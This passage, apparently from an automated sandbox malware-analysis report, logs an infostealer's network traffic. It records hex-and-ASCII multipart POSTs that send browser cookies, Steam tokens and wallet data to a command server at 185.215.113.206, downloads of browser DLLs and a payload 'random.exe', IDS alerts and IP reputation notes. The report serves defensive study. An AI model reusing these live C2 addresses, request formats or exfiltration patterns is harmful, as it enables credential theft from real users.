6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 2d 2d 0d 0a Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file"------HCBGDGCAAKJEBFIDBAAA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 2d 2d 0d 0a Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="file"------KJEGCFBGDHJJJJJKJECF--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="message"wallets------EHJJKFCBGIDGHIECGCBK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 2d 2d 0d 0a Data Ascii: ------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="message"files------KECBGCGCGIEGCBFHIIEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 2d 2d 0d 0a Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="file"------IEHCAKKJDBKKFHJJDHII--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="message"ybncbhylepme------AECAKECAEGDHIECBGHII--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 32 34 39 39 64 37 36 65 33 34 36 32 63 38 30 34 66 38 36 66 32 37 37 64 65 63 65 66 39 37 35 62 62 39 30 32 30 37 34 63 65 30 33 32 38 38 38 37 62 66 62 34 31 62 38 63 64 33 36 33 31 64 30 61 30 61 62 39 30 65 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="token"92499d76e3462c804f86f277decef975bb902074ce0328887bfb41b8cd3631d0a0ab90e9------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CAFBGHIDBGHJJKFHJDHC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49707 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49790 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49827 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.53.7
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7CC60 PR_Recv, 0_2_6CA7CC60
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TyDlpBOuBMC4KnB&MD=cRlZhfaz HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
